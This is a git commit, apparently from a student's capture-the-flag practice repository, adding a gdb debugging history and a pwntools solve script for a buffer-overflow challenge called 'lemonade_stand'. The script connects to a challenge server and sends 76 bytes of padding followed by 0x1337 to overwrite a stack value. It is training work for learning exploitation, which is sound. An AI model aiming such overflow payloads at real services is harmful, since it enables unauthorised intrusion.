First CTFs

2026-05-09 20:58:42 +02:00
commit 5635246581
21 changed files with 244 additions and 0 deletions
--- a/BOF/04_lemonade_stand/.gdb_history
+++ b/BOF/04_lemonade_stand/.gdb_history
@@ -0,0 +1,53 @@
+disass vuln
+b *0x00000000000012a7
+run
+n
+n
+n
+n
+n
+n
+c
+v
+c
+quit
+run
+disass main
+b *+23
+disass main
+breaj +23
+break +23
+info breakpoint
+info breakpoints
+clear breakpoints
+layout asm
+b <main+23>
+b main
+c
+r
+b +23
+b main+23
+b *(main+23)
+c
+ni
+ni
+c
+quit
+disass main
+quit
+disass main
+disass vuln
+b *0x00000000000012a2
+r
+b +5
+quit
+disass vuln
+b *0x00000000000012a2
+r
+quit
+quit
+run
+quit
+r
+disass vuln
+quit
--- a/BOF/04_lemonade_stand/lemonade_stand
+++ b/BOF/04_lemonade_stand/lemonade_stand
--- a/BOF/04_lemonade_stand/solve.py
+++ b/BOF/04_lemonade_stand/solve.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./lemonade_stand", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13562)
+# Your exploit here
+# mov eax, DWORD_PTR[rbp-0x4] overwrite eax value
+OFFSET = 76
+leet = 0x1337
+payload = flat(b"A" * OFFSET, p64(leet))
+p.send(payload)
+# p.send(b'cat flag\n')
+# p.recv()
+p.interactive()